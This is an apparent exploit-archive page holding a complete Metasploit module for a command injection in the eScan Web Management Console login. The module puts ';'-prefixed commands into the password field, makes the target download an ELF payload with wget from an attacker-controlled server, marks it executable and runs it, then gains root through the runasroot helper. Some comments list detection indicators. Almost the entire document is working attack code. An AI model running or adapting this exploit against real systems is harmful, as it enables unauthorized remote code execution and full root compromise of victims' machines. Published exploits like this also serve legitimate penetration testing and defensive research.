
eScan Web Management Console Command Injection

eScan Web Management Console Command Injection
Posted Apr 11, 2014
Authored by Joxean Koret, juan vazquez | Site metasploit.com

This Metasploit module exploits a command injection vulnerability found in the eScan Web Management Console. The vulnerability exists while processing CheckPass login requests. An attacker with a valid username can use a malformed password to execute arbitrary commands. With mwconf privileges, the runasroot utility can be abused to get root privileges. This Metasploit module has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.

tags | exploit, web, arbitrary, root
systems | linux, ubuntu
SHA-256 | be98f3a46fc9d7210a97e0f50b3bd1ba9ebef9cc6d3e9b5455d3e8e5c69531c0

eScan Web Management Console Command Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit exploit module for the eScan Web Management Console command
# injection described in the metadata below. Observable footprint, useful for
# detection: every injected command is carried in the `pass` field of a POST
# to login.php, prefixed with ";" and with ${IFS} standing in for spaces; the
# module stages an ELF into WRITABLEDIR with wget, chmods it 777 and runs it,
# then (for shell sessions) invokes the RUNASROOT helper to obtain root.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

# HttpClient sends the login POSTs; HttpServer::HTML hosts the ELF for the
# target to fetch (unless EXTURL is set); EXE builds the ELF; FileDropper
# removes the dropped file when the session is cleaned up.
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

# Module metadata and user options. Only a native ELF payload is supported:
# the characters a shell-command payload would need are rejected by the
# target (see the BadChars note), so the command is assembled by hand in
# wget_payload / exec_payload instead of using ARCH_CMD.
def initialize(info={})
super(update_info(info,
'Name' => "eScan Web Management Console Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in the eScan Web Management
Console. The vulnerability exists while processing CheckPass login requests. An attacker
with a valid username can use a malformed password to execute arbitrary commands. With
mwconf privileges, the runasroot utility can be abused to get root privileges. This module
has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Joxean Koret', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
],
'Payload' =>
{
'BadChars' => "", # The characters actually rejected when injecting are "|&)(!><'\"` "; that is why ARCH_CMD is avoided and an ELF is staged instead
'DisableNops' => true
},
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['eScan 5.5-2 / Linux', {}],
],
'DisclosureDate' => "Apr 04 2014",
'DefaultTarget' => 0))

# USERNAME must be a valid account: the injection happens during password
# checking, so an unknown user presumably never reaches the vulnerable path.
# RUNASROOT is a user-supplied path and is shell-escaped before use.
register_options(
[
Opt::RPORT(10080),
OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
], self.class)
end


# Fingerprints the console by fetching index.php and looking for the
# "eScan WebAdmin" banner. Returns Detected on a 200 containing the banner,
# Unknown otherwise; it confirms the product's presence, not the vulnerable
# version.
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, 'index.php')
})

# `and` binds looser than `&&`; harmless here because the condition contains
# no assignment, but `&&` is the idiomatic form.
if res and res.code == 200 and res.body =~ /eScan WebAdmin/
return Exploit::CheckCode::Detected
end

Exploit::CheckCode::Unknown
end

# Runs `cmd` on an established session and returns its output with the
# trailing newline removed, or "" when there is none. Only shell sessions are
# supported: on a meterpreter session nothing is executed and a warning is
# printed, so the root escalation in on_new_session does not happen there.
def cmd_exec(session, cmd)
case session.type
when /meterpreter/
print_warning("#{peer} - Use a shell payload in order to get root!")
when /shell/
o = session.shell_command_token(cmd)
o.chomp! if o
end
# `o` is only assigned on the shell branch, so it is nil for meterpreter
return "" if o.nil?
return o
end

# Session callback. The injected payload runs as the eScan service account
# (the original note says runasroot can only be executed by the mwconf uid,
# 196); the helper at RUNASROOT is used to start a root /bin/sh before the
# session is handed on to the framework via super.
def on_new_session(session)
cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
super
end

# Presumably invoked by the HttpServer mixin once the local web server is
# listening (the call originates outside this file — confirm). Records the
# URL the target must fetch and triggers the download.
def primer
@payload_url = get_uri
wget_payload
end

# Serves the ELF held in @pl to a client requesting the registered resource.
# Other URIs are logged but receive no response from this handler.
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
# Substring match on the resource name, not an exact path comparison
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status("Sending payload...")
send_response(cli, @pl)
end
end

# Entry point. Builds the ELF, then either hosts it locally (super runs the
# framework's HTTP server; HTTPDELAY bounds how long it is given before the
# module proceeds — Timeout::Error is the expected exit, not a failure) or
# directs the target to EXTURL. exec_payload follows in both cases.
def exploit
@pl = generate_payload_exe
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
@payload_url = ""

if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
# NOTE(review): with EXTURL nothing here verifies that the external host
# actually served the file; wget_payload only inspects the injection reply.
@payload_url = datastore['EXTURL']
wget_payload
exec_payload
end
end

# Builds and injects the download command. ${IFS} replaces every space
# because space is among the characters the target rejects (the full list is
# |&)(!><'"`[space]); an ARCH_CMD payload would trip over the same set.
# Success is inferred solely from the server answering with its normal
# "wrong password" redirect (302 to index.php?err_msg=password) — the same
# reply a failed login gets — so the module cannot tell whether wget ran or
# succeeded; the dropped file is registered for cleanup on that assumption.
def wget_payload
@dropped_elf = rand_text_alpha(rand(5) + 3)
command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"

print_status("#{peer} - Downloading the payload to the target machine...")
res = exec_command(command)
if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end

# Injects "chmod${IFS}777${IFS}<file>;<file>" so the dropped ELF becomes
# executable and is started. The 1-second timeout is deliberate and the
# response is ignored — presumably because the payload does not return
# promptly (confirm).
def exec_payload
command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
command << File.join(datastore['WRITABLEDIR'], @dropped_elf)

print_status("#{peer} - Executing the payload...")
exec_command(command, 1)
end

# Sends a single login POST to login.php with `command` in the password
# field, prefixed with ";" — presumably so it is appended to the shell
# command the server runs while handling CheckPass. The remaining fields are
# the ordinary login form values. Returns whatever send_request_cgi returns
# (nil when no response arrives within `timeout`, per the framework's usual
# behaviour — verify). Detection note: a `pass` value beginning with ";" and
# containing ${IFS}-separated tokens is a strong indicator of this exploit.
def exec_command(command, timeout=20)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
'vars_post' => {
'uname' => datastore['USERNAME'],
'pass' => ";#{command}",
'product_name' => 'escan',
'language' => 'English',
'login' => 'Login'
}
}, timeout)
end

end